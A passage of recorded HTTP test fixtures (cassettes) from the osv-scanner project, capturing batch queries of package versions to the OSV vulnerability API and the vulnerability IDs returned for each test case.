"2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] } ] } headers: Content-Length: - "433" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1073 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/one_specific_supported_sbom_with_invalid_PURLs url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 37 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "37" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1073 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/one_specific_supported_sbom_with_invalid_PURLs_using_-L_flag url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 37 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "37" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1852 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "ca-certificates-bundle" }, "version": "20220614-r4" }, { "package": { "ecosystem": "Alpine", "name": "libc-utils" }, "version": "0.7.2-r3" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Alpine", "name": "ssl_client" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.10-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/one_specific_supported_sbom_with_vulns url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 433 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", "modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] } ] } headers: Content-Length: - "433" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1852 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "ca-certificates-bundle" }, "version": "20220614-r4" }, { "package": { "ecosystem": "Alpine", "name": "libc-utils" }, "version": "0.7.2-r3" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Alpine", "name": "ssl_client" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.10-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/one_specific_supported_sbom_with_vulns_using_-L_flag url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 433 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", "modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] } ] } headers: Content-Length: - "433" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 149 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/only_the_files_in_the_given_directories_are_checked_by_default_(no_recursion) url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 144 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/output_format:_markdown_table url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 95 body: | { "results": [ { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] } ] } headers: Content-Length: - "95" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1712 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "PyPI", "name": "flask" }, "version": "1.0.0" }, { "package": { "ecosystem": "PyPI", "name": "black" }, "version": "25.1.0" }, { "package": { "ecosystem": "PyPI", "name": "django" }, "version": "1.11.29" }, { "package": { "ecosystem": "PyPI", "name": "flask" }, "version": "1.0.0" }, { "package": { "ecosystem": "PyPI", "name": "numpy" }, "version": "2.3.1" }, { "package": { "ecosystem": "PyPI", "name": "requests" }, "version": "2.20.0" }, { "package": { "ecosystem": "PyPI", "name": "django" }, "version": "2.2.24" }, { "package": { "ecosystem": "PyPI", "name": "django" }, "version": "1.11.29" }, { "package": { "ecosystem": "PyPI", "name": "flask" }, "version": "1.0.0" }, { "package": { "ecosystem": "PyPI", "name": "requests" }, "version": "2.20.0" }, { "package": { "ecosystem": "PyPI", "name": "numpy" }, "version": "2.3.1" }, { "package": { "ecosystem": "PyPI", "name": "flask" }, "version": "1.0.0" }, { "package": { "ecosystem": "PyPI", "name": "flask-cors" }, "version": "1.0.0" }, { "package": { "ecosystem": "PyPI", "name": "pandas" }, "version": "0.23.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/requirements.txt_can_have_all_kinds_of_names url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 4809 body: | { "results": [ { "vulns": [ { "id": "GHSA-68rp-wp8r-4726", "modified": "2026-02-23T23:43:45.778179Z" }, { "id": "GHSA-m2qf-hxjv-5gpq", "modified": "2025-02-21T05:42:17.337040Z" }, { "id": "PYSEC-2023-62", "modified": "2023-11-08T04:12:28.231927Z" } ] }, { "vulns": [ { "id": "GHSA-3936-cmfr-pm3m", "modified": "2026-03-16T16:44:03.077621Z" } ] }, { "vulns": [ { "id": "GHSA-68w8-qjq3-2gfm", "modified": "2024-09-20T15:46:52.557962Z" }, { "id": "GHSA-6w2r-r2m5-xq5w", "modified": "2026-02-04T04:00:06.061990Z" }, { "id": "GHSA-7xr5-9hcq-chf9", "modified": "2026-02-04T03:48:05.224740Z" }, { "id": "GHSA-8x94-hmjh-97hq", "modified": "2026-02-04T02:45:55.690257Z" }, { "id": "GHSA-frmv-pr5f-9mcr", "modified": "2025-11-27T09:10:30.649595Z" }, { "id": "GHSA-qw25-v68c-qjf3", "modified": "2026-02-04T04:08:30.303132Z" }, { "id": "GHSA-rrqc-c2jx-6jgv", "modified": "2024-10-30T19:23:59.139649Z" }, { "id": "PYSEC-2021-98", "modified": "2023-12-06T01:01:16.755410Z" } ] }, { "vulns": [ { "id": "GHSA-68rp-wp8r-4726", "modified": "2026-02-23T23:43:45.778179Z" }, { "id": "GHSA-m2qf-hxjv-5gpq", "modified": "2025-02-21T05:42:17.337040Z" }, { "id": "PYSEC-2023-62", "modified": "2023-11-08T04:12:28.231927Z" } ] }, {}, { "vulns": [ { "id": "GHSA-9hjg-9r4m-mvj7", "modified": "2026-02-04T03:44:00.676479Z" }, { "id": "GHSA-9wx4-h78v-vm56", "modified": "2026-02-04T02:43:42.271895Z" }, { "id": "GHSA-j8r2-6x86-q33q", "modified": "2026-02-04T03:34:13.807518Z" }, { "id": "PYSEC-2023-74", "modified": "2023-11-08T04:12:35.436175Z" } ] }, { "vulns": [ { "id": "GHSA-2gwj-7jmv-h26r", "modified": "2025-02-21T05:41:10.759178Z" }, { "id": "GHSA-53qw-q765-4fww", "modified": "2024-09-20T16:09:39.890846Z" }, { "id": "GHSA-6cw3-g6wv-c2xv", "modified": "2024-09-20T15:47:27.155401Z" }, { "id": "GHSA-6w2r-r2m5-xq5w", "modified": "2026-02-04T04:00:06.061990Z" }, { "id": "GHSA-7xr5-9hcq-chf9", "modified": "2026-02-04T03:48:05.224740Z" }, { "id": "GHSA-8c5j-9r9f-c6w8", "modified": "2025-02-21T05:29:59.213830Z" }, { "id": "GHSA-8x94-hmjh-97hq", "modified": "2026-02-04T02:45:55.690257Z" }, { "id": "GHSA-95rw-fx8r-36v6", "modified": "2024-09-20T15:47:46.984048Z" }, { "id": "GHSA-frmv-pr5f-9mcr", "modified": "2025-11-27T09:10:30.649595Z" }, { "id": "GHSA-jrh2-hc4r-7jwx", "modified": "2024-09-20T12:22:54.101910Z" }, { "id": "GHSA-qw25-v68c-qjf3", "modified": "2026-02-04T04:08:30.303132Z" }, { "id": "GHSA-rrqc-c2jx-6jgv", "modified": "2024-10-30T19:23:59.139649Z" }, { "id": "GHSA-v6rh-hp5x-86rv", "modified": "2024-11-19T05:35:04.095106Z" }, { "id": "GHSA-w24h-v9qh-8gxj", "modified": "2025-02-21T05:41:01.294618Z" }, { "id": "PYSEC-2021-439", "modified": "2023-12-06T01:01:41.266810Z" }, { "id": "PYSEC-2022-1", "modified": "2023-12-06T01:01:43.028018Z" }, { "id": "PYSEC-2022-19", "modified": "2023-12-06T01:01:58.226668Z" }, { "id": "PYSEC-2022-190", "modified": "2023-12-06T01:02:11.594317Z" }, { "id": "PYSEC-2022-191", "modified": "2023-12-06T01:02:11.666037Z" }, { "id": "PYSEC-2022-2", "modified": "2023-12-06T01:01:43.088680Z" }, { "id": "PYSEC-2022-20", "modified": "2023-12-06T01:02:02.697371Z" }, { "id": "PYSEC-2022-3", "modified": "2023-12-06T01:01:43.819827Z" } ] }, { "vulns": [ { "id": "GHSA-68w8-qjq3-2gfm", "modified": "2024-09-20T15:46:52.557962Z" }, { "id": "GHSA-6w2r-r2m5-xq5w", "modified": "2026-02-04T04:00:06.061990Z" }, { "id": "GHSA-7xr5-9hcq-chf9", "modified": "2026-02-04T03:48:05.224740Z" }, { "id": "GHSA-8x94-hmjh-97hq", "modified": "2026-02-04T02:45:55.690257Z" }, { "id": "GHSA-frmv-pr5f-9mcr", "modified": "2025-11-27T09:10:30.649595Z" }, { "id": "GHSA-qw25-v68c-qjf3", "modified": "2026-02-04T04:08:30.303132Z" }, { "id": "GHSA-rrqc-c2jx-6jgv", "modified": "2024-10-30T19:23:59.139649Z" }, { "id": "PYSEC-2021-98", "modified": "2023-12-06T01:01:16.755410Z" } ] }, { "vulns": [ { "id": "GHSA-68rp-wp8r-4726", "modified": "2026-02-23T23:43:45.778179Z" }, { "id": "GHSA-m2qf-hxjv-5gpq", "modified": "2025-02-21T05:42:17.337040Z" }, { "id": "PYSEC-2023-62", "modified": "2023-11-08T04:12:28.231927Z" } ] }, { "vulns": [ { "id": "GHSA-9hjg-9r4m-mvj7", "modified": "2026-02-04T03:44:00.676479Z" }, { "id": "GHSA-9wx4-h78v-vm56", "modified": "2026-02-04T02:43:42.271895Z" }, { "id": "GHSA-j8r2-6x86-q33q", "modified": "2026-02-04T03:34:13.807518Z" }, { "id": "PYSEC-2023-74", "modified": "2023-11-08T04:12:35.436175Z" } ] }, {}, { "vulns": [ { "id": "GHSA-68rp-wp8r-4726", "modified": "2026-02-23T23:43:45.778179Z" }, { "id": "GHSA-m2qf-hxjv-5gpq", "modified": "2025-02-21T05:42:17.337040Z" }, { "id": "PYSEC-2023-62", "modified": "2023-11-08T04:12:28.231927Z" } ] }, { "vulns": [ { "id": "GHSA-43qf-4rqw-9q2g", "modified": "2026-02-04T02:30:19.251090Z" }, { "id": "GHSA-7rxf-gvfg-47g4", "modified": "2026-02-04T04:27:15.173118Z" }, { "id": "GHSA-84pr-m4jr-85g5", "modified": "2026-02-04T02:57:32.875272Z" }, { "id": "GHSA-8vgw-p6qm-5gr7", "modified": "2026-02-04T02:42:09.564281Z" }, { "id": "GHSA-hxwh-jpp2-84pm", "modified": "2026-02-04T02:15:39.891834Z" }, { "id": "GHSA-xc3p-ff3m-f46v", "modified": "2024-09-20T20:01:25.449661Z" }, { "id": "PYSEC-2020-43", "modified": "2025-10-09T07:22:50.566622Z" }, { "id": "PYSEC-2024-71", "modified": "2025-10-09T08:27:44.186589Z" } ] }, { "vulns": [ { "id": "PYSEC-2020-73", "modified": "2023-11-08T04:02:12.263851Z" } ] } ] } headers: Content-Length: - "4809" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 638 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "has-flag" }, "version": "4.0.0" }, { "package": { "ecosystem": "npm", "name": "wrappy" }, "version": "1.0.2" }, { "package": { "ecosystem": "Packagist", "name": "league/flysystem" }, "version": "1.0.8" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.99.9" }, { "package": { "ecosystem": "Go", "name": "toolchain" }, "version": "1.99.9" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/spdx_2.3_output url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 107 body: | { "results": [ {}, {}, { "vulns": [ { "id": "GHSA-9f46-5r25-5wfm", "modified": "2026-03-13T22:01:08.982482Z" } ] }, {}, {} ] } headers: Content-Length: - "107" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/verbosity_level_=_error url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/verbosity_level_=_info url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommandNonGit.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommandNonGit/one_specific_supported_lockfile url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_CallAnalysis.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 427 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf" }, "version": "1.3.1" }, { "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield" }, "version": "1.0.0" }, { "package": { "ecosystem": "Go", "name": "golang.org/x/image" }, "version": "0.4.0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_CallAnalysis/Run_with_govulncheck url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 798 body: | { "results": [ { "vulns": [ { "id": "GHSA-c3h9-896r-86jm", "modified": "2026-02-04T02:43:17.273837Z" }, { "id": "GO-2021-0053", "modified": "2026-02-04T03:28:45.369468Z" } ] }, { "vulns": [ { "id": "GHSA-2h6c-j3gf-xp9r", "modified": "2023-11-08T04:11:41.796349Z" }, { "id": "GO-2023-1558", "modified": "2024-05-20T16:03:47Z" } ] }, { "vulns": [ { "id": "GHSA-9phm-fm57-rhg8", "modified": "2026-02-04T03:56:37.185672Z" }, { "id": "GHSA-j3p8-6mrq-6g7h", "modified": "2024-05-20T21:54:17Z" }, { "id": "GHSA-qgc7-mgm3-q253", "modified": "2024-05-20T21:46:58Z" }, { "id": "GHSA-x92r-3vfx-4cv3", "modified": "2024-05-20T21:54:21Z" }, { "id": "GO-2023-1572", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2023-1989", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2023-1990", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2024-2937", "modified": "2026-02-04T03:54:25.251608Z" } ] } ] } headers: Content-Length: - "798" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 158 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf" }, "version": "1.3.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_CallAnalysis/Run_with_govulncheck_all_uncalled url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 158 body: | { "results": [ { "vulns": [ { "id": "GHSA-c3h9-896r-86jm", "modified": "2026-02-04T02:43:17.273837Z" }, { "id": "GO-2021-0053", "modified": "2026-02-04T03:28:45.369468Z" } ] } ] } headers: Content-Length: - "158" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 158 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf" }, "version": "1.3.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_CallAnalysis/Run_with_govulncheck_all_uncalled_but_enabled_all-vulns_flag url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 158 body: | { "results": [ { "vulns": [ { "id": "GHSA-c3h9-896r-86jm", "modified": "2026-02-04T02:43:17.273837Z" }, { "id": "GO-2021-0053", "modified": "2026-02-04T03:28:45.369468Z" } ] } ] } headers: Content-Length: - "158" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_CommitSupport.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 814 host: api.osv.dev body: | { "queries": [ { "commit": "1a9dda41fbfb0dfbec17ab6afeba8138265395f7" }, { "commit": "1a9dda41fbfb0dfbec17ab6afeba8138265395f7" }, { "commit": "1a9dda41fbfb0dfbec17ab6afeba8138265395f7" }, { "commit": "931a40a746f5678dcc4625b06a2eb25fa4f00b34" }, { "commit": "17b30e96476be70b8773b2b807bab857fd3ceb39" }, { "commit": "1a9dda41fbfb0dfbec17ab6afeba8138265395f7" }, { "commit": "f82211036f434593c69b8e3680ea65203a46d315" }, { "commit": "45fda76bc1b9fd74d10e85e0ce9b65a12dcc58b0" }, { "commit": "aea7aaf2abb04789f5868cbabec406ea43aa84bf" }, { "commit": "3b064fdb022912bbb98f5b8d9d111aeb6fec8f79" }, { "commit": "0f428d190410263e4daa65b917c0e84707a9c0ef" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_CommitSupport/online_uses_git_commits url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 3821 body: | { "results": [ { "vulns": [ { "id": "OSV-2018-389", "modified": "2022-04-13T03:04:40.912286Z" } ] }, { "vulns": [ { "id": "OSV-2018-389", "modified": "2022-04-13T03:04:40.912286Z" } ] }, { "vulns": [ { "id": "OSV-2018-389", "modified": "2022-04-13T03:04:40.912286Z" } ] }, { "vulns": [ { "id": "CVE-2023-44398", "modified": "2026-03-14T12:15:05.895469Z" }, { "id": "CVE-2024-24826", "modified": "2026-03-14T12:31:29.719981Z" }, { "id": "CVE-2024-25112", "modified": "2026-03-14T12:27:30.328627Z" }, { "id": "CVE-2024-39695", "modified": "2026-03-14T12:34:50.263863Z" }, { "id": "CVE-2025-26623", "modified": "2026-03-08T15:58:57.067224Z" }, { "id": "CVE-2025-54080", "modified": "2026-03-08T15:58:53.801236Z" }, { "id": "CVE-2025-55304", "modified": "2026-03-08T15:59:02.674652Z" }, { "id": "CVE-2026-25884", "modified": "2026-03-08T15:58:58.717366Z" }, { "id": "CVE-2026-27596", "modified": "2026-03-03T02:56:32.656501Z" }, { "id": "CVE-2026-27631", "modified": "2026-03-08T16:18:26.088498Z" }, { "id": "OSV-2023-1161", "modified": "2025-03-18T00:34:06.623648Z" }, { "id": "OSV-2024-340", "modified": "2026-03-18T14:24:19.040933Z" }, { "id": "PYSEC-2023-233", "modified": "2025-10-09T08:26:40.736495Z" } ] }, { "vulns": [ { "id": "CVE-2021-22569", "modified": "2026-03-15T14:08:15.471655Z" }, { "id": "CVE-2022-1941", "modified": "2026-03-15T22:44:13.683347Z" }, { "id": "CVE-2022-3171", "modified": "2026-03-14T15:01:36.349851Z" }, { "id": "CVE-2022-3509", "modified": "2026-03-14T11:46:42.854777Z" }, { "id": "CVE-2022-3510", "modified": "2026-03-14T11:46:31.172987Z" }, { "id": "CVE-2024-2410", "modified": "2026-03-14T12:30:27.419430Z" }, { "id": "CVE-2024-7254", "modified": "2026-03-12T17:24:46.870042Z" } ] }, { "vulns": [ { "id": "OSV-2018-389", "modified": "2022-04-13T03:04:40.912286Z" } ] }, { "vulns": [ { "id": "CVE-2024-51757", "modified": "2026-03-14T12:38:40.503950Z" }, { "id": "CVE-2025-61927", "modified": "2026-03-14T12:44:19.001278Z" }, { "id": "CVE-2025-62410", "modified": "2025-12-05T10:21:14.984236Z" } ] }, { "vulns": [ { "id": "CVE-2024-12797", "modified": "2026-03-15T14:13:01.994465Z" }, { "id": "CVE-2024-13176", "modified": "2026-03-15T22:49:27.674006Z" }, { "id": "CVE-2024-9143", "modified": "2026-03-15T22:52:44.104304Z" }, { "id": "CVE-2025-9230", "modified": "2026-03-15T21:45:01.944849Z" }, { "id": "CVE-2025-9231", "modified": "2026-03-15T21:45:14.388367Z" }, { "id": "CVE-2025-9232", "modified": "2026-03-15T22:22:16.665069Z" } ] }, { "vulns": [ { "id": "CVE-2025-11187", "modified": "2026-03-13T22:14:04.753650Z" }, { "id": "CVE-2025-15467", "modified": "2026-03-15T22:51:41.488774Z" }, { "id": "CVE-2025-15468", "modified": "2026-03-15T22:51:46.393921Z" }, { "id": "CVE-2025-15469", "modified": "2026-03-15T14:52:52.732682Z" }, { "id": "CVE-2025-66199", "modified": "2026-03-15T14:15:22.516013Z" }, { "id": "CVE-2025-68160", "modified": "2026-03-15T22:52:16.241316Z" }, { "id": "CVE-2025-69418", "modified": "2026-03-15T22:52:15.052519Z" }, { "id": "CVE-2025-69419", "modified": "2026-03-15T22:52:23.255585Z" }, { "id": "CVE-2025-69420", "modified": "2026-03-15T14:54:02.448397Z" }, { "id": "CVE-2025-9230", "modified": "2026-03-15T21:45:01.944849Z" }, { "id": "CVE-2025-9231", "modified": "2026-03-15T21:45:14.388367Z" }, { "id": "CVE-2025-9232", "modified": "2026-03-15T22:22:16.665069Z" }, { "id": "CVE-2026-22795", "modified": "2026-03-15T14:55:17.107605Z" }, { "id": "CVE-2026-22796", "modified": "2026-03-15T22:54:02.133546Z" }, { "id": "CVE-2026-2673", "modified": "2026-03-15T14:54:45.482332Z" } ] }, { "vulns": [ { "id": "CVE-2023-53159", "modified": "2026-03-11T18:20:56.090230Z" }, { "id": "CVE-2023-6180", "modified": "2026-03-13T21:59:51.199646Z" }, { "id": "CVE-2025-24898", "modified": "2026-02-04T02:18:45.944425Z" }, { "id": "CVE-2025-3416", "modified": "2026-03-14T15:04:13.605678Z" } ] }, { "vulns": [ { "id": "CVE-2016-10931", "modified": "2026-03-14T09:18:29.278606Z" }, { "id": "CVE-2018-20997", "modified": "2026-03-14T09:29:08.646634Z" }, { "id": "CVE-2023-53159", "modified": "2026-03-11T18:20:56.090230Z" }, { "id": "CVE-2023-6180", "modified": "2026-03-13T21:59:51.199646Z" }, { "id": "CVE-2025-3416", "modified": "2026-03-14T15:04:13.605678Z" } ] } ] } headers: Content-Length: - "3821" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_Config_UnusedIgnores.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1852 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "ca-certificates-bundle" }, "version": "20220614-r4" }, { "package": { "ecosystem": "Alpine", "name": "libc-utils" }, "version": "0.7.2-r3" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": 